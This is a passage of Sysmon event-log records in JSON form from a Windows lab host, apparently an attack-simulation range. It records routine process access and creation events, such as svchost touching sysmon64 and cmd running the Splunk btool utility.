{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3564,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3565,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00100F800500}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00100F800500}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.974\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-0010CB800500}\r\nProcessId: 2864\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00100F800500}\r\nParentProcessId: 3468\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.974","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010CB800500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00100F800500}","ParentProcessId":"3468","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00100F800500}\r\nSourceProcessId: 3468\r\nSourceThreadId: 4568\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010CB800500}\r\nTargetProcessId: 2864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00100F800500}","SourceProcessId":"3468","SourceThreadId":"4568","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010CB800500}","TargetProcessId":"2864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010CB800500}\r\nTargetProcessId: 2864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010CB800500}","TargetProcessId":"2864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 